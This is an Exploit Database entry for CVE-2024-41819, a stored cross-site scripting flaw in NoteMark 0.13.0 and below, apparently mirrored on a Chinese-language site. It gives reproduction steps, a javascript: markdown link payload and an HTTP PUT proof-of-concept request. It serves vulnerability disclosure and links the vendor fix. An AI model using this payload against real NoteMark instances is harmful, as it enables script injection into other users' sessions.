NoteMark < 0.13.0 - Stored XSS

• Exploit Database
• 21 阅读

• 作者： Alessio Romano (sfoffo)
  日期： 2024-08-28
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/52078/

• # Exploit Title: Stored XSS in NoteMark
  # Date: 07/29/2024
  # Exploit Author: Alessio Romano (sfoffo)
  # Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/
  # Version: 0.13.0 and below
  # Tested on: Linux
  # References:
  https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,
  https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,
  https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3
  # CVE: CVE-2024-41819
  
  ## Steps to Reproduce
  1. Log in to the application.
  2. Create a new note or enter a previously created note.
  3. Access the note editor functionality from the selected note by clicking
  on the "Editor" tab.
  4. Input the following payload:
  [xss-link](javascript:alert(1))
  5. Save the changes.
  6. Click on the "Rendered" tab to view the rendered markdown version of the
  note. Click on the previously created link to pop the injected alert.
  
  ## HTTP Request PoC
  
  PUT /api/notes/<note-uuid>/content HTTP/1.1
  Host: localhost:8000
  Accept: */*
  Content-Type: text/plain;charset=UTF-8
  Content-Length: 34
  Sec-Fetch-Site: same-origin
  Authorization: Bearer <TOKEN>
  
  
  [xss-link](javascript:alert(1))